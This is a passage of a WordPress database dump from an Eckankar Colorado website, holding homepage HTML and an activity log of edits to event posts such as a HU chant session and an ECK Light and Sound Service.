class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234611,39854,'_user_email','nada@zipnadanot.org'),(234612,39854,'_server_remote_addr','76.130.120.x'),(234613,39854,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269259'),(234614,39855,'post_id','269259'),(234615,39855,'post_type','mec-events'),(234616,39855,'post_title','Tune In to the God Force'),(234617,39855,'post_prev_post_name',''),(234618,39855,'post_new_post_name','tune-in-to-the-god-force'),(234619,39855,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, a natural way to connect with Spirit</span></strong></span></p>\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\n<br>\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\n<br>\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\n<ul class=\"\">\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\n</ul>\n<p class=\"\"><br>\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br>\n<br>\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">www.TheSoundofSoul.org</a>.</span></p>\n<p class=\"\"><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\n</span></strong></span></span></p>\n</div>\n</div>\n</div>\n</div>'),(234620,39855,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, a natural way to connect with Spirit</span></strong></span></p>\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">www.TheSoundofSoul.org</a>.</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234621,39855,'post_prev_post_status','draft'),(234622,39855,'post_new_post_status','publish'),(234623,39855,'post_prev_post_date','2023-10-25 13:47:31'),(234624,39855,'post_new_post_date','2023-10-25 13:48:46'),(234625,39855,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(234626,39855,'post_new_post_date_gmt','2023-10-25 19:48:46'),(234627,39855,'post_prev_thumb_id','266472'),(234628,39855,'post_prev_thumb_title','misty-path-1'),(234629,39855,'post_new_thumb_id','266063'),(234630,39855,'post_new_thumb_title','sunset-lightshine'),(234631,39855,'_message_key','post_updated'),(234632,39855,'_user_id','2'),(234633,39855,'_user_login','S8zhaBda'),(234634,39855,'_user_email','nada@zipnadanot.org'),(234635,39855,'_server_remote_addr','76.130.120.x'),(234636,39855,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269259'),(234637,39856,'post_id','269260'),(234638,39856,'post_type','mec-events'),(234639,39856,'post_title','ECK LIGHT &#038; SOUND TEMPLATE-In Person &#038; Online-CONTAINS REGISTRATION | Benefit Title goes here'),(234640,39856,'_message_key','post_updated'),(234641,39856,'_user_id','2'),(234642,39856,'_user_login','S8zhaBda'),(234643,39856,'_user_email','nada@zipnadanot.org'),(234644,39856,'_server_remote_addr','76.130.120.x'),(234645,39856,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(234646,39857,'new_post_title','ECK LIGHT & SOUND TEMPLATE-In Person & Online-CONTAINS REGISTRATION | Benefit Title goes here'),(234647,39857,'new_post_id','269260'),(234648,39857,'duplicated_post_title','ECK LIGHT & SOUND TEMPLATE-In Person & Online-CONTAINS REGISTRATION | Benefit Title goes here'),(234649,39857,'duplicated_post_id','266540'),(234650,39857,'_message_key','post_duplicated'),(234651,39857,'_user_id','2'),(234652,39857,'_user_login','S8zhaBda'),(234653,39857,'_user_email','nada@zipnadanot.org'),(234654,39857,'_server_remote_addr','76.130.120.x'),(234655,39857,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(234656,39858,'post_id','269260'),(234657,39858,'post_type','mec-events'),(234658,39858,'post_title','Our Spiritual Wake-up Calls'),(234659,39858,'post_new_thumb_id','266160'),(234660,39858,'post_new_thumb_title','bird-sky-1'),(234661,39858,'post_meta_added','79'),(234662,39858,'_message_key','post_updated'),(234663,39858,'_user_id','2'),(234664,39858,'_user_login','S8zhaBda'),(234665,39858,'_user_email','nada@zipnadanot.org'),(234666,39858,'_server_remote_addr','76.130.120.x'),(234667,39858,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269260'),(234668,39859,'post_id','269260'),(234669,39859,'post_type','mec-events'),(234670,39859,'post_title','Our Spiritual Wake-up Calls'),(234671,39859,'post_new_thumb_id','266160'),(234672,39859,'post_new_thumb_title','bird-sky-1'),(234673,39859,'post_meta_added','79'),(234674,39859,'_message_key','post_updated'),(234675,39859,'_user_id','2'),(234676,39859,'_user_login','S8zhaBda'),(234677,39859,'_user_email','nada@zipnadanot.org'),(234678,39859,'_server_remote_addr','76.130.120.x'),(234679,39859,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269260'),(234680,39860,'post_id','269260'),(234681,39860,'post_type','mec-events'),(234682,39860,'post_title','Our Spiritual Wake-up Calls'),(234683,39860,'post_new_thumb_id','266160'),(234684,39860,'post_new_thumb_title','bird-sky-1'),(234685,39860,'post_meta_added','79'),(234686,39860,'_message_key','post_updated'),(234687,39860,'_user_id','2'),(234688,39860,'_user_login','S8zhaBda'),(234689,39860,'_user_email','nada@zipnadanot.org'),(234690,39860,'_server_remote_addr','76.130.120.x'),(234691,39860,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269260'),(234692,39861,'post_id','269260'),(234693,39861,'post_type','mec-events'),(234694,39861,'post_title','Our Spiritual Wake-up Calls'),(234695,39861,'post_prev_post_name',''),(234696,39861,'post_new_post_name','our-spiritual-wake-up-calls'),(234697,39861,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></p>\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\n<ul class=\"\">\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\n</ul>\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\n</span></span></p>\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(234698,39861,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div 